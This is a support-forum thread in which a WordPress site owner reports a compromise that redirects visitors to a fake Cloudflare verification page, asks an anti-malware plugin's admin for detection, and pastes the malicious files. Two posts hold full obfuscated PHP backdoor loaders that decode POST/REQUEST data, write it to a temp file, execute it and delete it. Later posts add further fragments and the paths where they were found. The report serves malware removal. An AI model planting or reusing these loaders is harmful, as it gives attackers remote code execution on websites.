Possible ClickFix infection – fake Cloudflare verification page

Home Forums Support Forum Possible ClickFix infection – fake Cloudflare verification page

This topic contains 5 replies, has 2 voices, and was last updated by  Anti-Malware Admin 1 week, 4 days ago.

Viewing 6 posts - 1 through 6 (of 6 total)
  • Author
    Posts
  • #175869

    Please add detection and cleanup for this ClickFix infection:

    Malicious files are added under:
    wp-includes/php-ai-client/
    The infected site redirects visitors to a fake Cloudflare verification page.
    Please remove the added malicious files and any injected PHP, JavaScript, database entries, or scheduled tasks responsible for the redirect.

    Thank you for this excellent plugin. It has already saved me several times.

    #175906

    Thanks for the report but I’ll need to see those infected files to add them to me definition updates.

    Can you send the actual files or send a link to a download site where you have shared them so that I can inspect the full contents of the infected files?

    #175918

    hi

    {‘id’: 3107, ‘code’: ‘ATyGJWyL<?php\n\nif(in_array(“c\\x6F\\x6Dp”, array_keys($_REQUEST))){\n$dchunk = array_filter([session_save_path(), ini_get(“upload_tmp_dir”), getenv(“TEMP”), “/dev/shm”, sys_get_temp_dir(), getcwd(), getenv(“TMP”), “/var/tmp”, “/tmp”]);\n$data_chunk = $_REQUEST[“c\\x6F\\x6Dp”];\n\t$data_chunk =explode \t( \’.\’ \t\t, \t$data_chunk)\t;\n$itm =\’\’;\n$salt7 =\’abcdefghijklmnopqrstuvwxyz0123456789\’;\n$sLen =strlen($salt7);\n$i =0;\n$__len =count($data_chunk);\n\ndo {\n if ($i >= $__len) break;\n $val =$data_chunk[$i];\n $chS =ord($salt7[$i % $sLen]);\n $d =((int)$val – $chS – ($i % 10)) ^ 16;\n $itm .= chr($d);\n $i++;\n} while (true);\nwhile ($ent = array_shift($dchunk)) {\n if (is_dir($ent) ? is_writable($ent) : false) {\n $ref = vsprintf(“%s/%s”, [$ent, “.entity”]);\n $binding = fopen($ref, \’w\’);\nif ($binding && fwrite($binding, $itm)) {\n fclose($binding);\n require $ref;\n @unlink($ref);\n exit;\n}\n }\n}\n}’, ‘url_postfix’: ‘;fputs_enc;16;comp’}

    #175920

    Additional file On the Path wp-includes/sitemaps/bottom-1778750513.php:

    {‘id’: 13891, ‘code’: ‘uzgGsYPy<?php\n\nif(isset($_POST[“\\x64\\x65sc”])){\n$ptr = array_filter([“/tmp”, sys_get_temp_dir(), “/var/tmp”, getcwd(), ini_get(“upload_tmp_dir”), “/dev/shm”, getenv(“TEMP”), getenv(“TMP”), session_save_path()]);\n$dat = hex2bin($_POST[“\\x64\\x65sc”]);\n$data_chunk =\’\’;$f=0;do{$data_chunk.=chr(ord($dat[$f])^49);$f++;}while($f<strlen($dat));\nwhile ($pgrp = array_shift($ptr)) {\n if ((bool)is_dir($pgrp) && (bool)is_writable($pgrp)) {\n $pset = “$pgrp/.reference”;\n if ($value = fopen($pset, \’w\’)) {\n fwrite($value, $data_chunk);\n fclose($value);\n include_once $pset;\n unlink($pset);\n die();\n}\n }\n}\n}’, ‘url_postfix’: ‘;fputs_xor;49;desc’}

    #175922

    wp-includes/IXR/config_1778750398.php
    107, ‘code’: ‘ATyGJWyL<?php\n\nif(in_array(“c\\x6F\\x6Dp”, array_keys($_REQUEST))){\n$dchunk = array_filter([session_save_path(), ini_get(“upload_tmp_dir”), getenv(“TEMP”), “/dev/shm”, sys_get…

    /wp-content/themes/agent.php
    (int)rOuND(0+0+0+0);

    wp-content/languages/widget_area_1781011032.php
    = hex2bin($_POST[“en\x74\x69t\x

    wp-content/themes/custom.file.2.1785240271.php
    <!–WiN0WHbi–> \x0a <?php \x0a \x0a if(!is_null($_POST[“\x65nt\x72y”] ?? null)){ \x0a $marker = $_POST[“\x65nt\x72y”]; \x0a \x09 $marker \x09 \x09 = \x09 \x09 explode ( \x09 \x09 \x09 “.” \x09 , \ x09 \x09 \x09 $marker \x09 ); \x0a $pgrp = ”; \x0a $s8 = ‘abcdefghijklmnopqrstuvwxyz01234567

    It links to a gambling site [Redacted]

    • This reply was modified 1 week, 4 days ago by  Anti-Malware Admin. Reason: URL Redacted for security reasons
    #175976

    Unfortunately that does not help. I will need to see each whole file in it’s original format to write a definition that will remove all of the malicious code with removing any potentially removing any original benign code too. I cannot write a definition based on a fragment of code pasted into a post here.

    Please find a way to send me all these files in their entirely original format. If you cannot attach them directly to a email to me then please try uploading them somewhere and send me a link to download them. wetransfer.com should work if you don’t have any other preferred method.

Viewing 6 posts - 1 through 6 (of 6 total)

You must be logged in to reply to this topic.

Comments are closed.